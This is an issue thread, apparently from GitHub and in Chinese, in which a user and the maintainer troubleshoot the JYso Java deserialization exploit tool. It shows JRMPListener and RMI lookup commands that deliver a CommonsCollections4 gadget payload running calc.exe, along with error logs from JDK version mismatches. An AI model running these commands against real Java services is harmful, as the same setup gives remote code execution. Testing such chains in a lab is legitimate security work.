怎么测试CC4的链子？看完了wiki不会用。

[wgf4242]

启动

java -jar JYso-1.3.1.jar -j -i 127.0.0.1

是这样执行 calc么？ Naming.lookup("rmi://127.0.0.1:1099/Deserialization/CommonsCollections4/command/Base64/Y2FsYw==");

结果并不行。用ysoserial测过是没问题的。 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 calc.exe Naming.lookup("rmi://192.168.50.161:1099/test");

[+] LDAP Server Start Listening on >>1389...
[+] HTTP Server Start Listening on >>3456...
[+] RMI  Server Start Listening on >>1099...
[+] Have connection from /127.0.0.1:52795
[+] RMI服务器 >> 正在读取信息
[+] RMI服务器 >> RMI 查询Deserialization/CommonsCollections4/command/Base64/Y2FsYw== 2
Closing connection
Exception in thread "main" java.lang.IllegalAccessError: class com.qi4l.jndi.RMIServer (in unnamed module @0x5e316c74) cannot access class com.sun.jndi.rmi.registry.ReferenceWrapper (in module jdk.naming.rmi) because module jdk.naming.rmi does not export com.sun.jndi.rmi.registry to unnamed module @0x5e316c74
        at com.qi4l.jndi.RMIServer.handleRMI(RMIServer.java:267)
        at com.qi4l.jndi.RMIServer.doCall(RMIServer.java:241)
        at com.qi4l.jndi.RMIServer.doMessage(RMIServer.java:193)
        at com.qi4l.jndi.RMIServer.run(RMIServer.java:146)
        at com.qi4l.jndi.RMIServer.start(RMIServer.java:62)
        at com.qi4l.jndi.Starter.main(Starter.java:25)

[qi4L]

RMI中没有Deserialization路由。。。

[qi4L]

java -cp JYso.jar -y com.qi4l.jndi.exploit.JRMPListener 8888 -g CommonsCollections4 -p calc.exe

[wgf4242]

openjdk version "17.0.11" 2024-04-16

java -cp JYso.jar -y com.qi4l.jndi.exploit.JRMPListener 8888 -g CommonsCollections4 -p calc.exe

java -cp JYso-1.3.1.jar -y com.qi4l.jndi.exploit.JRMPListener 1099 -g CommonsCollections4 -p calc.exe
* Opening JRMP listener on 1099
Have connection from /192.168.50.161:61486
Reading message...
Sending return with payload for obj [0:0:0, 0]
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
        at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
        at com.qi4l.jndi.gadgets.utils.Reflections.setAccessible(Reflections.java:13)
        at com.qi4l.jndi.gadgets.utils.Reflections.getField(Reflections.java:20)
        at com.qi4l.jndi.gadgets.utils.Reflections.setFieldValue(Reflections.java:29)
        at com.qi4l.jndi.exploit.JRMPListener.doCall(JRMPListener.java:275)
        at com.qi4l.jndi.exploit.JRMPListener.doMessage(JRMPListener.java:217)
        at com.qi4l.jndi.exploit.JRMPListener.run(JRMPListener.java:171)
        at com.qi4l.jndi.exploit.JRMPListener.main(JRMPListener.java:80)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
        at com.nqzero.permit.Permit.<init>(Permit.java:222)
        at com.nqzero.permit.Permit.build(Permit.java:117)
        at com.nqzero.permit.Permit.<clinit>(Permit.java:16)

不行啊。报这个错误。

[qi4L]

用JDK1.8吧，或者你换成JDK17重新编译一下

[wgf4242]

用JDK1.8吧，或者你换成JDK17重新编译一下

F:\>java -version                                                                                                            java version "1.8.0_51"
Java(TM) SE Runtime Environment (build 1.8.0_51-b16)
Java HotSpot(TM) 64-Bit Server VM (build 25.51-b03, mixed mode)
F:\downloads>java -cp JYso-1.3.0.jar com.qi4l.jndi.exploit.JRMPListener 1099 -g CommonsCollections4 -p calc.exe
* Opening JRMP listener on 1099
Have connection from /192.168.50.161:62615
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection

也是没成功。

[qi4L]

这个明显不是我的问题了啊

[wgf4242]

这个明显不是我的问题了啊

复制你的命令忘改了。。改了一下。。还是没成功。

[qi4L]

确实是有问题，改了 感谢反馈

[qi4L]